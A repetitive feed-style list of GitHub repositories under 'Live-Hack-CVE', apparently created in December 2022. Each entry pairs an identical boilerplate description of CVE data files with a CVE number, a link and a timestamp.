**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20687 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20687](https://github.com/Live-Hack-CVE/CVE-2022-20687) create time: 2022-12-22T23:00:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1195 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1195](https://github.com/Live-Hack-CVE/CVE-2022-1195) create time: 2022-12-22T23:00:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1353 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1353](https://github.com/Live-Hack-CVE/CVE-2022-1353) create time: 2022-12-22T23:00:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25836 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25836](https://github.com/Live-Hack-CVE/CVE-2022-25836) create time: 2022-12-22T22:59:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25837 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25837](https://github.com/Live-Hack-CVE/CVE-2022-25837) create time: 2022-12-22T22:59:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35295 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35295](https://github.com/Live-Hack-CVE/CVE-2022-35295) create time: 2022-12-22T22:59:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37928 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37928](https://github.com/Live-Hack-CVE/CVE-2022-37928) create time: 2022-12-22T22:59:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30284 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30284](https://github.com/Live-Hack-CVE/CVE-2022-30284) create time: 2022-12-22T22:58:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44654 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44654](https://github.com/Live-Hack-CVE/CVE-2022-44654) create time: 2022-12-22T22:58:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44653 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44653](https://github.com/Live-Hack-CVE/CVE-2022-44653) create time: 2022-12-22T22:58:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44652 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44652](https://github.com/Live-Hack-CVE/CVE-2022-44652) create time: 2022-12-22T22:58:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44651 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44651](https://github.com/Live-Hack-CVE/CVE-2022-44651) create time: 2022-12-22T22:58:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45970 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45970](https://github.com/Live-Hack-CVE/CVE-2022-45970) create time: 2022-12-22T22:58:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45968 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45968](https://github.com/Live-Hack-CVE/CVE-2022-45968) create time: 2022-12-22T22:58:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42919 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42919](https://github.com/Live-Hack-CVE/CVE-2022-42919) create time: 2022-12-22T22:57:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23748 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23748](https://github.com/Live-Hack-CVE/CVE-2022-23748) create time: 2022-12-22T22:57:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34318 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34318](https://github.com/Live-Hack-CVE/CVE-2022-34318) create time: 2022-12-22T22:57:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44636 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44636](https://github.com/Live-Hack-CVE/CVE-2022-44636) create time: 2022-12-22T22:57:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41296 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41296](https://github.com/Live-Hack-CVE/CVE-2022-41296) create time: 2022-12-22T22:57:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45996 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45996](https://github.com/Live-Hack-CVE/CVE-2022-45996) create time: 2022-12-22T22:56:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45980 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45980](https://github.com/Live-Hack-CVE/CVE-2022-45980) create time: 2022-12-22T22:56:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45979 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45979](https://github.com/Live-Hack-CVE/CVE-2022-45979) create time: 2022-12-22T22:56:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45977 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45977](https://github.com/Live-Hack-CVE/CVE-2022-45977) create time: 2022-12-22T22:56:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3641 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3641](https://github.com/Live-Hack-CVE/CVE-2022-3641) create time: 2022-12-22T22:56:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25736 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25736](https://github.com/Live-Hack-CVE/CVE-2020-25736) create time: 2022-12-22T22:05:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21599 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21599](https://github.com/Live-Hack-CVE/CVE-2020-21599) create time: 2022-12-22T21:22:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41943 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41943](https://github.com/Live-Hack-CVE/CVE-2021-41943) create time: 2022-12-22T22:05:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32415 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32415](https://github.com/Live-Hack-CVE/CVE-2021-32415) create time: 2022-12-22T22:05:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3671 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3671](https://github.com/Live-Hack-CVE/CVE-2021-3671) create time: 2022-12-22T22:05:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4243 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4243](https://github.com/Live-Hack-CVE/CVE-2021-4243) create time: 2022-12-22T21:54:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4244 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4244](https://github.com/Live-Hack-CVE/CVE-2021-4244) create time: 2022-12-22T21:54:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40463 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40463](https://github.com/Live-Hack-CVE/CVE-2021-40463) create time: 2022-12-22T21:54:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40462 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40462](https://github.com/Live-Hack-CVE/CVE-2021-40462) create time: 2022-12-22T21:23:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40465 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40465](https://github.com/Live-Hack-CVE/CVE-2021-40465) create time: 2022-12-22T21:23:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21707 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21707](https://github.com/Live-Hack-CVE/CVE-2021-21707) create time: 2022-12-22T21:22:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35452 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35452](https://github.com/Live-Hack-CVE/CVE-2021-35452) create time: 2022-12-22T21:21:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36411 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36411](https://github.com/Live-Hack-CVE/CVE-2021-36411) create time: 2022-12-22T21:21:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36410 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36410](https://github.com/Live-Hack-CVE/CVE-2021-36410) create time: 2022-12-22T21:21:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36409 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36409](https://github.com/Live-Hack-CVE/CVE-2021-36409) create time: 2022-12-22T21:21:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36408 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36408](https://github.com/Live-Hack-CVE/CVE-2021-36408) create time: 2022-12-22T21:21:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41273 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41273](https://github.com/Live-Hack-CVE/CVE-2022-41273) create time: 2022-12-22T22:10:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41275 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41275](https://github.com/Live-Hack-CVE/CVE-2022-41275) create time: 2022-12-22T22:10:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20487 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20487](https://github.com/Live-Hack-CVE/CVE-2022-20487) create time: 2022-12-22T22:10:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20491 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20491](https://github.com/Live-Hack-CVE/CVE-2022-20491) create time: 2022-12-22T22:10:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41268 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41268](https://github.com/Live-Hack-CVE/CVE-2022-41268) create time: 2022-12-22T22:09:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41267 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41267](https://github.com/Live-Hack-CVE/CVE-2022-41267) create time: 2022-12-22T22:09:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41266 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41266](https://github.com/Live-Hack-CVE/CVE-2022-41266) create time: 2022-12-22T22:09:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37932 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37932](https://github.com/Live-Hack-CVE/CVE-2022-37932) create time: 2022-12-22T22:09:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38395 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38395](https://github.com/Live-Hack-CVE/CVE-2022-38395) create time: 2022-12-22T22:09:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41264 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41264](https://github.com/Live-Hack-CVE/CVE-2022-41264) create time: 2022-12-22T22:09:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41263 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41263](https://github.com/Live-Hack-CVE/CVE-2022-41263) create time: 2022-12-22T22:09:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41261 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41261](https://github.com/Live-Hack-CVE/CVE-2022-41261) create time: 2022-12-22T22:09:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43518 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43518](https://github.com/Live-Hack-CVE/CVE-2022-43518) create time: 2022-12-22T22:09:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4444 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4444](https://github.com/Live-Hack-CVE/CVE-2022-4444) create time: 2022-12-22T22:08:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4312 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4312](https://github.com/Live-Hack-CVE/CVE-2022-4312) create time: 2022-12-22T22:08:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43541 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43541](https://github.com/Live-Hack-CVE/CVE-2022-43541) create time: 2022-12-22T22:08:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4311 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4311](https://github.com/Live-Hack-CVE/CVE-2022-4311) create time: 2022-12-22T22:08:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25692 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25692](https://github.com/Live-Hack-CVE/CVE-2022-25692) create time: 2022-12-22T22:08:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25695 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25695](https://github.com/Live-Hack-CVE/CVE-2022-25695) create time: 2022-12-22T22:08:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25702 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25702](https://github.com/Live-Hack-CVE/CVE-2022-25702) create time: 2022-12-22T22:08:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25698 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25698](https://github.com/Live-Hack-CVE/CVE-2022-25698) create time: 2022-12-22T22:08:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25697 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25697](https://github.com/Live-Hack-CVE/CVE-2022-25697) create time: 2022-12-22T22:08:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25672 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25672](https://github.com/Live-Hack-CVE/CVE-2022-25672) create time: 2022-12-22T22:08:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25673 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25673](https://github.com/Live-Hack-CVE/CVE-2022-25673) create time: 2022-12-22T22:08:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25682 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25682](https://github.com/Live-Hack-CVE/CVE-2022-25682) create time: 2022-12-22T22:08:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25681 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25681](https://github.com/Live-Hack-CVE/CVE-2022-25681) create time: 2022-12-22T22:08:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25675 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25675](https://github.com/Live-Hack-CVE/CVE-2022-25675) create time: 2022-12-22T22:08:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25677 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25677](https://github.com/Live-Hack-CVE/CVE-2022-25677) create time: 2022-12-22T22:08:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25685 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25685](https://github.com/Live-Hack-CVE/CVE-2022-25685) create time: 2022-12-22T22:08:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25691 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25691](https://github.com/Live-Hack-CVE/CVE-2022-25691) create time: 2022-12-22T22:08:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9419 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9419](https://github.com/Live-Hack-CVE/CVE-2020-9419) create time: 2022-12-22T20:37:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9420 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9420](https://github.com/Live-Hack-CVE/CVE-2020-9420) create time: 2022-12-22T20:37:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44695 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44695](https://github.com/Live-Hack-CVE/CVE-2021-44695) create time: 2022-12-22T21:11:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44694 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44694](https://github.com/Live-Hack-CVE/CVE-2021-44694) create time: 2022-12-22T20:39:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40365 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40365](https://github.com/Live-Hack-CVE/CVE-2021-40365) create time: 2022-12-22T20:38:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44693 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44693](https://github.com/Live-Hack-CVE/CVE-2021-44693) create time: 2022-12-22T20:38:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41877 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41877](https://github.com/Live-Hack-CVE/CVE-2022-41877) create time: 2022-12-22T21:15:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39347 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39347](https://github.com/Live-Hack-CVE/CVE-2022-39347) create time: 2022-12-22T21:15:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39320 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39320](https://github.com/Live-Hack-CVE/CVE-2022-39320) create time: 2022-12-22T21:15:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39316 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39316](https://github.com/Live-Hack-CVE/CVE-2022-39316) create time: 2022-12-22T21:15:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39319 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39319](https://github.com/Live-Hack-CVE/CVE-2022-39319) create time: 2022-12-22T21:15:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39318 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39318](https://github.com/Live-Hack-CVE/CVE-2022-39318) create time: 2022-12-22T21:15:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39317 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39317](https://github.com/Live-Hack-CVE/CVE-2022-39317) create time: 2022-12-22T21:15:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41262 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41262](https://github.com/Live-Hack-CVE/CVE-2022-41262) create time: 2022-12-22T21:15:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41274 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41274](https://github.com/Live-Hack-CVE/CVE-2022-41274) create time: 2022-12-22T21:15:15Z

